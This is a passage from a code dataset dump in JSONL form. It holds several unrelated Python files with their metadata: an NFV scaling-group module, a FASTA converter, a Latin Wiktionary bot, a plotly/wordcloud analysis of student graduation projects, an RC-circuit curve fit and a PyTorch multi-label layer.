"six.moves.socketserver.BaseServer", "line_number": 107, "usage_type": "name"}, {"api_name": "pants.util.socket.RecvBufferedSocket", "line_number": 108, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 108, "usage_type": "call"}, {"api_name": "six.moves.socketserver.TCPServer.server_bind", "line_number": 124, "usage_type": "call"}, {"api_name": "six.moves.socketserver.TCPServer", "line_number": 124, "usage_type": "name"}, {"api_name": "pants.util.socket.safe_select", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "302730534", "text": "\n# Copyright 2016 RIFT.IO Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport asyncio\nimport time\nfrom collections import defaultdict\n\nfrom enum import Enum\n\nfrom gi.repository import NsdYang, NsrYang, RwDts\nimport rift.tasklets\n\n\nclass ScalingGroupIndexExists(Exception):\n pass\n\n\nclass ScaleGroupTrigger(Enum):\n \"\"\" Trigger for scaling config \"\"\"\n PRE_SCALE_IN = 1\n POST_SCALE_IN = 2\n PRE_SCALE_OUT = 3\n POST_SCALE_OUT = 4\n\n\nclass ScaleGroupState(Enum):\n \"\"\" Scaling group state \"\"\"\n RUNNING = 1\n SCALING_IN = 2\n SCALING_OUT = 3\n\n\nclass ScalingGroup(object):\n \"\"\" This represents a configured NSR scaling group \"\"\"\n def __init__(self, log, group_msg):\n \"\"\" Create a ScalingGroup instance\n\n This class is responsible for representing a configured scaling group\n which is present within an NSR.\n\n :param log: A logger instance\n :param group_msg: A NSD scaling group pb message\n \"\"\"\n self._log = log\n self._group_msg = group_msg\n\n self._instances = {}\n\n def __str__(self):\n return \"ScalingGroup(%s)\" % self.name\n\n @property\n def name(self):\n \"\"\" Name of the scaling group \"\"\"\n return self._group_msg.name\n\n @property\n def state(self):\n \"\"\" State of the scaling group \"\"\"\n state = ScaleGroupState.RUNNING\n for instance in self._instances.values():\n if instance.operational_status in [\"init\", \"vnf_init_phase\"]:\n self._log.debug(\"Scaling instance %s in scaling-out state: %s\",\n instance, instance.operational_status)\n state = ScaleGroupState.SCALING_OUT\n\n elif instance.operational_status in [\"terminate\", \"vnf_terminate_phase\"]:\n self._log.debug(\"Scaling instance %s in scaling-in state: %s\",\n instance, instance.operational_status)\n state = ScaleGroupState.SCALING_IN\n\n return state\n\n @property\n def vnf_index_count_map(self):\n \"\"\" The mapping of member_vnf_index_ref to count\"\"\"\n return {mbr.member_vnf_index_ref: mbr.count for mbr in self._group_msg.vnfd_member}\n\n @property\n def group_msg(self):\n \"\"\" Return the scale group PB message \"\"\"\n return self._group_msg\n\n @property\n def min_instance_count(self):\n \"\"\" Minimum (and default) number of instance of the scaling group \"\"\"\n return self._group_msg.min_instance_count\n\n @property\n def max_instance_count(self):\n \"\"\" Maximum number of instance of the scaling group \"\"\"\n return self._group_msg.max_instance_count\n\n def create_record_msg(self):\n \"\"\" Returns a NSR Scaling group record \"\"\"\n msg = NsrYang.YangData_Nsr_NsInstanceOpdata_Nsr_ScalingGroupRecord(\n scaling_group_name_ref=self.name,\n )\n\n for instance in self.instances:\n msg.instance.append(instance.create_record_msg())\n\n return msg\n\n @property\n def instances(self):\n return self._instances.values()\n\n def get_instance(self, instance_id):\n \"\"\" Get a scaling group instance\n\n :param instance_id: The instance's instance_id\n \"\"\"\n return self._instances[instance_id]\n\n def create_instance(self, instance_id, is_default=False):\n \"\"\" Create a scaling group instance\n\n :param instance_id: The new instance's instance_id\n \"\"\"\n self._log.debug(\"Creating %s instance instance_id %s \", self, instance_id)\n\n if instance_id in self._instances:\n raise ScalingGroupIndexExists(\"%s instance_id %s already exists\" % (self, instance_id))\n\n instance = ScalingGroupInstance(\n log=self._log,\n group_name=self.name,\n instance_id=instance_id,\n is_default=is_default,\n )\n\n self._instances[instance_id] = instance\n\n return instance\n\n def delete_instance(self, instance_id):\n self._log.debug(\"Deleting %s instance instance_id %s \", self, instance_id)\n del self._instances[instance_id]\n\n def trigger_map(self, trigger):\n trig_map = {\n NsdYang.ScalingTrigger.PRE_SCALE_IN : 'pre_scale_in',\n NsdYang.ScalingTrigger.POST_SCALE_IN : 'post_scale_in',\n NsdYang.ScalingTrigger.PRE_SCALE_OUT : 'pre_scale_out',\n NsdYang.ScalingTrigger.POST_SCALE_OUT : 'post_scale_out',\n }\n\n try:\n return trig_map[trigger]\n except Exception as e:\n self._log.error(\"Unknown scaling group trigger passed: {}\".format(trigger))\n self._log.exception(e)\n\n def trigger_config(self, trigger):\n \"\"\" Get the config action for the trigger \"\"\"\n self._log.debug(\"Trigger config {}: {}\".format(trigger, self._group_msg))\n trig = self.trigger_map(trigger)\n if trig is None:\n return\n\n for config in self._group_msg.scaling_config_action:\n if trig == config.trigger:\n return config\n\n\nclass ScalingGroupInstance(object):\n \"\"\" This class represents a configured NSR Scaling Group instance\"\"\"\n\n valid_status_list = (\n \"init\",\n \"vnf_init_phase\",\n \"running\",\n \"terminate\",\n \"vnf_terminate_phase\",\n \"terminated\",\n \"failed\",\n )\n\n def __init__(self, log, group_name, instance_id, is_default=False):\n self._log = log\n self._group_name = group_name\n self._instance_id = instance_id\n self._is_default = is_default\n\n self._vnfrs = {}\n\n self._create_time = int(time.time())\n self._op_status = \"init\"\n\n def __str__(self):\n return \"ScalingGroupInstance(%s #%s)\" % (self._group_name, self.instance_id)\n\n @property\n def operational_status(self):\n return self._op_status\n\n @operational_status.setter\n def operational_status(self, op_status):\n if op_status not in ScalingGroupInstance.valid_status_list:\n raise ValueError(\"Invalid scaling group instance status: %s\", op_status)\n\n self._op_status = op_status\n\n @property\n def instance_id(self):\n return self._instance_id\n\n @property\n def is_default(self):\n return self._is_default\n\n @property\n def vnfrs(self):\n \"\"\" Return all VirtualNetworkFunctionRecord's that have been added\"\"\"\n return self._vnfrs.values()\n\n def create_record_msg(self):\n msg = NsrYang.YangData_Nsr_NsInstanceOpdata_Nsr_ScalingGroupRecord_Instance(\n instance_id=self._instance_id,\n create_time=self._create_time,\n op_status=self._op_status,\n is_default=self._is_default\n )\n\n for vnfr in self.vnfrs:\n msg.vnfrs.append(vnfr.id)\n\n return msg\n\n def add_vnfr(self, vnfr):\n \"\"\" Add a VirtualNetworkFunctionRecord\"\"\"\n self._log.debug(\"Added %s to %s\", vnfr, self)\n self._vnfrs[vnfr.id] = vnfr", "sub_path": "modules/core/mano/rwlaunchpad/plugins/rwnsm/rift/tasklets/rwnsmtasklet/scale_group.py", "file_name": "scale_group.py", "file_ext": "py", "file_size_in_byte": 7551, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "enum.Enum", "line_number": 30, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 38, "usage_type": "name"}, {"api_name": "gi.repository.NsrYang.YangData_Nsr_NsInstanceOpdata_Nsr_ScalingGroupRecord", "line_number": 108, "usage_type": "call"}, {"api_name": "gi.repository.NsrYang", "line_number": 108, "usage_type": "name"}, {"api_name": "gi.repository.NsdYang.ScalingTrigger", "line_number": 155, "usage_type": "attribute"}, {"api_name": "gi.repository.NsdYang", "line_number": 155, "usage_type": "name"}, {"api_name": "gi.repository.NsdYang.ScalingTrigger", "line_number": 156, "usage_type": "attribute"}, {"api_name": "gi.repository.NsdYang", "line_number": 156, "usage_type": "name"}, {"api_name": "gi.repository.NsdYang.ScalingTrigger", "line_number": 157, "usage_type": "attribute"}, {"api_name": "gi.repository.NsdYang", "line_number": 157, "usage_type": "name"}, {"api_name": "gi.repository.NsdYang.ScalingTrigger", "line_number": 158, "usage_type": "attribute"}, {"api_name": "gi.repository.NsdYang", "line_number": 158, "usage_type": "name"}, {"api_name": "time.time", "line_number": 200, "usage_type": "call"}, {"api_name": "gi.repository.NsrYang.YangData_Nsr_NsInstanceOpdata_Nsr_ScalingGroupRecord_Instance", "line_number": 231, "usage_type": "call"}, {"api_name": "gi.repository.NsrYang", "line_number": 231, "usage_type": "name"}]} +{"seq_id": "145556452", "text": "from pathlib import Path\nimport time\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--reference', '-r', type=str, required=True,\n help='Relative or absolute path to the folder containing\\\n one or multiple reference fasta files')\nparser.add_argument('--outfile', '-out', type=str, default='.',\n help='Specify absolute or relative path to output directory, default = .')\nargs = parser.parse_args()\n\n\n# preparing files and folders\nts = time.time()\n\np = Path(args.outfile)\nref_files = Path(args.reference)\n\noutput_folder = Path(f'{p}', 'results', 'preprocessed_references', f'{ts}')\noutput_folder.mkdir(parents=True, exist_ok=True)\n\n# processing formated outputs\nfor reference in ref_files.glob('*.fa*'):\n name = ''\n header = ''\n sequence = ''\n with open(reference) as f:\n ref_path = Path(reference)\n name = ref_path.stem\n lines = f.readlines()\n for i, line in enumerate(lines):\n if i < len(lines)-1:\n if line.startswith('>'):\n header += line.strip()\n else:\n sequence += line.strip()\n else:\n sequence += line.strip()\n\n output_file_path = output_folder / f'{name}.fasta'\n with output_file_path.open(\"w\", encoding=\"utf-8\") as of:\n of.write(f'>{header}\\n')\n of.write(f'{sequence}')", "sub_path": "tools/fasta_prepr/fasta_multiline_to_singleline.py", "file_name": "fasta_multiline_to_singleline.py", "file_ext": "py", "file_size_in_byte": 1380, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 6, "usage_type": "call"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 18, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "45385437", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, tname, msg, site\n\nimport lalib\n\ndef investigate_possible_adj(index, adj_pagename, adv, adv_defns):\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, adj_pagename, txt))\n pagemsg(\"Trying for adverb %s\" % adv)\n page = pywikibot.Page(site, adj_pagename)\n if not page.exists():\n pagemsg(\"Doesn't exist for adverb %s\" % adv)\n return\n\n text = str(page.text)\n\n retval = lalib.find_latin_section(text, pagemsg)\n if retval is None:\n return\n\n sections, j, secbody, sectail, has_non_latin = retval\n\n subsections = re.split(\"(^===+[^=\\n]+===+\\n)\", secbody, 0, re.M)\n\n for k in range(2, len(subsections), 2):\n parsed = blib.parse_text(subsections[k])\n for t in parsed.filter_templates():\n origt = str(t)\n tn = tname(t)\n if tn in [\"la-adj\", \"la-part\"]:\n adj = lalib.la_get_headword_from_template(t, adj_pagename, pagemsg)[0]\n adj_defns = lalib.find_defns(subsections[k])\n msg(\"%s /// %s /// %s /// %s\" % (adv, adj, \";\".join(adv_defns), \";\".join(adj_defns)))\n\ndef process_page(page, index):\n pagetitle = str(page.title())\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n notes = []\n\n if \" \" in pagetitle:\n pagemsg(\"WARNING: Space in page title, skipping\")\n return\n pagemsg(\"Processing\")\n\n text = str(page.text)\n\n retval = lalib.find_latin_section(text, pagemsg)\n if retval is None:\n return\n\n sections, j, secbody, sectail, has_non_latin = retval\n\n subsections = re.split(\"(^===+[^=\\n]+===+\\n)\", secbody, 0, re.M)\n\n for k in range(2, len(subsections), 2):\n parsed = blib.parse_text(subsections[k])\n for t in parsed.filter_templates():\n origt = str(t)\n tn = tname(t)\n if tn == \"la-adv\":\n adv = blib.remove_links(getparam(t, \"1\")) or pagetitle\n macron_stem, is_stem = lalib.infer_adv_stem(adv)\n if not is_stem:\n pagemsg(\"WARNING: Couldn't infer stem from adverb %s, not standard: %s\" % (\n adv, origt))\n continue\n adv_defns = lalib.find_defns(subsections[k])\n possible_adjs = []\n stem = lalib.remove_macrons(macron_stem)\n possible_adjs.append(stem + \"us\")\n possible_adjs.append(stem + \"is\")\n if stem.endswith(\"nt\"):\n possible_adjs.append(stem[:-2] + \"ns\")\n if stem.endswith(\"plic\"):\n possible_adjs.append(stem[:-2] + \"ex\")\n if stem.endswith(\"c\"):\n possible_adjs.append(stem[:-1] + \"x\")\n if re.search(\"[aeiou]r$\", stem):\n possible_adjs.append(stem)\n elif stem.endswith(\"r\"):\n possible_adjs.append(stem[:-1] + \"er\")\n if adv.endswith(\"iē\"):\n possible_adjs.append(stem + \"ius\")\n for possible_adj in possible_adjs:\n investigate_possible_adj(index, possible_adj, adv, adv_defns)\n\nparser = blib.create_argparser(\"Find corresponding adjectives for Latin adverbs\",\n include_pagefile=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nblib.do_pagefile_cats_refs(args, start, end, process_page,\n default_cats=[\"Latin adverbs\"])\n", "sub_path": "find_latin_adj_for_adv.py", "file_name": "find_latin_adj_for_adv.py", "file_ext": "py", "file_size_in_byte": 3204, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "blib.msg", "line_number": 13, "usage_type": "call"}, {"api_name": "pywikibot.Page", "line_number": 15, "usage_type": "call"}, {"api_name": "blib.site", "line_number": 15, "usage_type": "argument"}, {"api_name": "lalib.find_latin_section", "line_number": 22, "usage_type": "call"}, {"api_name": "re.split", "line_number": 28, "usage_type": "call"}, {"api_name": "re.M", "line_number": 28, "usage_type": "attribute"}, {"api_name": "blib.parse_text", "line_number": 31, "usage_type": "call"}, {"api_name": "blib.tname", "line_number": 34, "usage_type": "call"}, {"api_name": "lalib.la_get_headword_from_template", "line_number": 36, "usage_type": "call"}, {"api_name": "lalib.find_defns", "line_number": 37, "usage_type": "call"}, {"api_name": "blib.msg", "line_number": 38, "usage_type": "call"}, {"api_name": "blib.msg", "line_number": 43, "usage_type": "call"}, {"api_name": "lalib.find_latin_section", "line_number": 54, "usage_type": "call"}, {"api_name": "re.split", "line_number": 60, "usage_type": "call"}, {"api_name": "re.M", "line_number": 60, "usage_type": "attribute"}, {"api_name": "blib.parse_text", "line_number": 63, "usage_type": "call"}, {"api_name": "blib.tname", "line_number": 66, "usage_type": "call"}, {"api_name": "blib.remove_links", "line_number": 68, "usage_type": "call"}, {"api_name": "blib.getparam", "line_number": 68, "usage_type": "call"}, {"api_name": "lalib.infer_adv_stem", "line_number": 69, "usage_type": "call"}, {"api_name": "lalib.find_defns", "line_number": 74, "usage_type": "call"}, {"api_name": "lalib.remove_macrons", "line_number": 76, "usage_type": "call"}, {"api_name": "re.search", "line_number": 85, "usage_type": "call"}, {"api_name": "blib.create_argparser", "line_number": 94, "usage_type": "call"}, {"api_name": "blib.parse_start_end", "line_number": 97, "usage_type": "call"}, {"api_name": "blib.do_pagefile_cats_refs", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "591944643", "text": "from plotly.graph_objs import Scatter, Layout\nimport plotly\nimport plotly.offline as py\nimport numpy as np\nimport plotly.graph_objs as go\nimport jieba.analyse\nfrom matplotlib import pyplot as plt\nfrom wordcloud import WordCloud\nfrom PIL import Image\nimport re\n\nfrom db_util import get_data, execute\n\n\ndef analyse_academy():\n sql_academy = \"SELECT student_major, COUNT(*) from project GROUP BY student_major ORDER BY COUNT(*) DESC\"\n academy_data = execute(sql_academy)\n academy_dict = {}\n for index in range(len(academy_data)):\n name = academy_data[index][0]\n value = academy_data[index][1]\n academy_dict[name] = value\n trace0 = go.Bar(\n x= list(academy_dict.keys()),\n y= list(academy_dict.values()),\n name = '毕业人数',\n marker = dict(\n color = 'rgb(0,229,238)'\n )\n )\n sql_male = \"SELECT student_major, COUNT(*) from project WHERE student_gender = '男' GROUP BY student_major ORDER BY COUNT(*) DESC\"\n male_data = execute(sql_male)\n male_dict = {}\n for index in range(len(male_data)):\n name = male_data[index][0]\n value = male_data[index][1]\n male_dict[name] = value\n trace1 = go.Bar(\n x= list(male_dict.keys()),\n y= list(male_dict.values()),\n name = '男生人数',\n marker = dict(\n color = 'rgb(255,185, 15)'\n )\n )\n sql_female = \"SELECT student_major, COUNT(*) from project WHERE student_gender = '女' GROUP BY student_major ORDER BY COUNT(*) DESC\"\n female_data = execute(sql_female)\n female_dict = {}\n for index in range(len(female_data)):\n name = female_data[index][0]\n value = female_data[index][1]\n female_dict[name] = value\n trace2 = go.Bar(\n x=list(female_dict.keys()),\n y=list(female_dict.values()),\n name='女生人数',\n marker=dict(\n color='rgb(255,69,0)'\n )\n )\n data = [trace0, trace1, trace2]\n py.plot(data)\n return None\n\ndef analyse_project_teacher():\n sql = \"SELECT teacher_name, COUNT(*) from project GROUP BY teacher_name ORDER BY COUNT(*) DESC\"\n teacher_data = execute(sql)[0:20]\n teacher_dict = {}\n for index in range(len(teacher_data)):\n name = teacher_data[index][0]\n value = teacher_data[index][1]\n teacher_dict[name] = value\n trace0 = go.Bar(\n x=list(teacher_dict.keys()),\n y=list(teacher_dict.values()),\n name='指导人数',\n marker=dict(\n color='rgb(100,149,237)'\n )\n )\n data = [trace0]\n py.plot(data)\n return None\n\ndef analyse_project_student_name():\n sql = \"SELECT student_name, COUNT(*) from project GROUP BY student_name ORDER BY COUNT(*) DESC LIMIT 68\"\n student_name_data = execute(sql)\n student_name_dict = {}\n for index in range(len(student_name_data)):\n name = student_name_data[index][0]\n value = student_name_data[index][1]\n student_name_dict[name] = value\n\n male_dict = {}\n female_dict = {}\n for name in student_name_dict.keys():\n sql_male = \"SELECT COUNT(*) from project WHERE student_name = %s AND student_gender = '男'\" % (\"'\"+name+\"'\")\n sql_female = \"SELECT COUNT(*) from project WHERE student_name = %s AND student_gender = '女'\" % (\"'\"+name+\"'\")\n male_data = execute(sql_male)\n female_data = execute(sql_female)\n male_dict[name] = male_data[0][0]\n female_dict[name] = female_data[0][0]\n\n trace0 = go.Bar(\n x=list(male_dict.keys()),\n y=list(male_dict.values()),\n name='男',\n marker=dict(\n color='rgb(100,149,237)'\n )\n )\n\n trace1 = go.Bar(\n x=list(female_dict.keys()),\n y=list(female_dict.values()),\n name='女',\n marker=dict(\n color='rgb(238,44,44)'\n )\n )\n\n data = [trace0,trace1]\n layout = go.Layout(\n barmode='stack'\n )\n fig = go.Figure(data=data, layout=layout)\n py.plot(fig, filename='stacked-bar')\n\ndef analyse_project_type_and_property():\n sql_type = \"SELECT project_type, COUNT(*) from project GROUP BY project_type ORDER BY COUNT(*) DESC LIMIT 5\"\n type_data = execute(sql_type)\n type_dict = {}\n for index in range(len(type_data)):\n name = type_data[index][0]\n value = type_data[index][1]\n type_dict[name] = value\n trace0 = go.Bar(\n x= list(type_dict.keys()),\n y= list(type_dict.values()),\n name = '课题类型',\n marker = dict(\n color = 'rgb(139,10,80)'\n )\n )\n\n sql_property = \"SELECT project_property, COUNT(*) from project GROUP BY project_property ORDER BY COUNT(*) DESC LIMIT 6\"\n property_data = execute(sql_property)\n property_dict = {}\n for index in range(len(property_data)):\n name = property_data[index][0]\n value = property_data[index][1]\n property_dict[name] = value\n trace1 = go.Bar(\n x=list(property_dict.keys()),\n y=list(property_dict.values()),\n name='课题性质',\n marker=dict(\n color='rgb(255,228,225)'\n )\n )\n\n data = [trace0, trace1]\n py.plot(data)\n return None\n\ndef annlyse_project_title(academy, stopword, img_url):\n path = r'C:\\Users\\casua\\Desktop\\新建文件夹'\n font = r'C:/Windows/Fonts/STKAITI.ttf'\n sql = \"SELECT project_name FROM project WHERE student_major = %s \" % academy\n data = execute(sql)\n words = {}\n # for title in list(data):\n # for w, c in jieba.analyse.extract_tags(str(title), withWeight=True):\n # try:\n # words[w] = words[w] + float(c)\n # except:\n # words[w] = float(c)\n\n\n wash_signature = []\n a= list(data)\n print(list(a))\n for title in list(data):\n rep = re.compile(\"1f\\d+\\w*|[<>/=【】『』♂ω]\")\n item = rep.sub(\"\", title[0])\n wash_signature.append(item)\n\n words = \"\".join(wash_signature)\n wordlist = jieba.cut(words, cut_all=True)\n rst = \" \".join(wordlist)\n print(len(rst))\n img = Image.open(path + img_url)\n img_array = np.array(img)\n wc = WordCloud(\n background_color='white',\n width=1000,\n height=800,\n mask=img_array,\n font_path=font,\n stopwords=stopword\n )\n wc.generate_from_text(rst) # 绘制图片\n plt.imshow(wc)\n plt.axis('off')\n plt.figure()\n plt.show() # 显示图片\n wc.to_file(path + r'\\new.png') # 保存图片\n return None\n\n\nif __name__ == '__main__':\n # data = analyse_academy()\n # analyse_project_teacher()\n # analyse_project_student_name()\n # analyse_project_type_and_property()\n cs_stopword = ['基于', '设计', '实现', '管理系', '管理', '管理系统']\n cs_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n cs_name = \"'\"+'计算机科学与工程学院'+\"'\"\n\n ee_stopword = ['基于','设计','控制','系统']\n ee_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n ee_name = \"'\" + '电子信息学院' + \"'\"\n\n ec_stopword = ['设计','研究','XXX','XX']\n ec_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n ec_name = \"'\" + '经济管理学院' + \"'\"\n\n cl_stopword = ['研究','设计']\n cl_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n cl_name = \"'\" + '材料科学与工程学院' + \"'\"\n\n cb_stopword = ['研究']\n cb_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n cb_name = \"'\" + '船舶与海洋工程学院' + \"'\"\n\n annlyse_project_title(cl_name, cl_stopword, cl_img_url)", "sub_path": "analysis.py", "file_name": "analysis.py", "file_ext": "py", "file_size_in_byte": 7545, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "db_util.execute", "line_number": 17, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 23, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 23, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 32, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 38, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 38, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 47, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 53, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 53, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 62, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 62, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 73, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 73, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 82, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 87, "usage_type": "call"}, {"api_name": "db_util.execute", "line_number": 99, "usage_type": "call"}, {"api_name": "db_util.execute", "line_number": 100, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 104, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 104, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 113, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 113, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 123, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 123, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 126, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 126, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 127, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 127, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 131, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 137, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 137, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 147, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 153, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 153, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 163, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 163, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 170, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 184, "usage_type": "call"}, {"api_name": "jieba.analyse.cut", "line_number": 189, "usage_type": "call"}, {"api_name": "jieba.analyse", "line_number": 189, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 192, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 192, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 193, "usage_type": "call"}, {"api_name": "wordcloud.WordCloud", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}]} +{"seq_id": "193365014", "text": "from scipy.optimize import curve_fit\nfrom scipy.signal import TransferFunction\nfrom matplotlib import pyplot\n\nimport csv\nimport numpy\n\n#v_s = {} # tensão da entrada\n#v_s['x'] = []\n#v_s['y'] = []\n\nv_c = {} # tensão da saída - indutor\nv_c['x'] = []\nv_c['y'] = []\n\n\n# leitura dos dados do canal 1 - entrada degrau\n#with open('ch1_tratado.csv', newline='\\n') as csvfile:\n# spamreader = csv.reader(csvfile, delimiter = ',')\n# for row in spamreader:\n# v_s['x'].append(row[3])\n# v_s['y'].append(row[4])\n\n# leitura dos dados do canal 2 - saída do indutor\nwith open('F0001CH2.CSV', newline='\\n') as csvfile:\n spamreader = csv.reader(csvfile, delimiter = ',')\n for row in spamreader:\n v_c['x'].append(row[3])\n v_c['y'].append(row[4])\n\n# convertendo os dados para valores numéricos\n\nv_c['x'] = [float(x) for x in v_c['x']]\nv_c['y'] = [float(y) for y in v_c['y']]\n\n''' resposta do indutor a entrada degrau:\n V_l = V_s*e^(-t*(R/L))\n'''\nf = lambda t, V, R, C: V * (1 - numpy.exp(-t/(R*C)))\n\n# fiting dos parametros da curva para t >= 0\npopt, pcov = curve_fit(f, v_c['x'][v_c['x'].index(0.):], v_c['y'][v_c['x'].index(0.):])\n\nv_c_adj = [ f(x, popt[0], popt[1], popt[2]) for x in v_c['x'][v_c['x'].index(0.):]]\n\n# impressão dos parametros da curva:\nprint(popt)\n\n# impressão do erro / desvio padrão\nprint(numpy.sqrt(numpy.diag(pcov)))\n\n# plotting dos gráficos - a ser melhorado:\npyplot.plot(v_c['x'][v_c['x'].index(0.):],v_c['y'][v_c['x'].index(0.):],'x',v_c['x'][v_c['x'].index(0.):],v_c_adj,'r-')\npyplot.show()\n", "sub_path": "CDSD/pratica_1/processamento.py", "file_name": "processamento.py", "file_ext": "py", "file_size_in_byte": 1548, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "csv.reader", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "561719853", "text": "import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass MultiLabelLayer(nn.Module):\n def __init__(self, class_num, input_length):\n super(MultiLabelLayer, self).__init__()\n self.class_num = class_num\n self.input_length = input_length\n self.softmax = nn.Softmax()\n linear_sq = []\n for i in range(len(class_num)):\n linear_sq.append(nn.Linear(self.input_length, class_num[i]))\n self.linear_sq = linear_sq\n\n def forward(self, x):\n result = []\n for linear in self.linear_sq:\n out = F.softmax(linear(x), dim=1)\n result.append(out)\n return result\n\n\nclass MultiOutModel(nn.Module):\n def __init__(self, model, label_list):\n super(MultiOutModel, self).__init__()\n self.model = model\n self.label_list = label_list\n\n def forward(self, x):\n x = self.model(x)\n x = x.view(x.size(0), -1)\n length = x.size(1)\n linear = MultiLabelLayer(self.label_list, length)\n out = linear(x)\n return out\n\n\nif __name__ == '__main__':\n import torch\n from models.shufflenet import ShuffleNetG2\n model = ShuffleNetG2()\n net = MultiOutModel(model, [2, 2, 2])\n x = torch.rand(1, 3, 32, 32)\n print(net(x))\n\n", "sub_path": "utils/multi_label.py", "file_name": "multi_label.py", "file_ext": "py", "file_size_in_byte": 1271, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 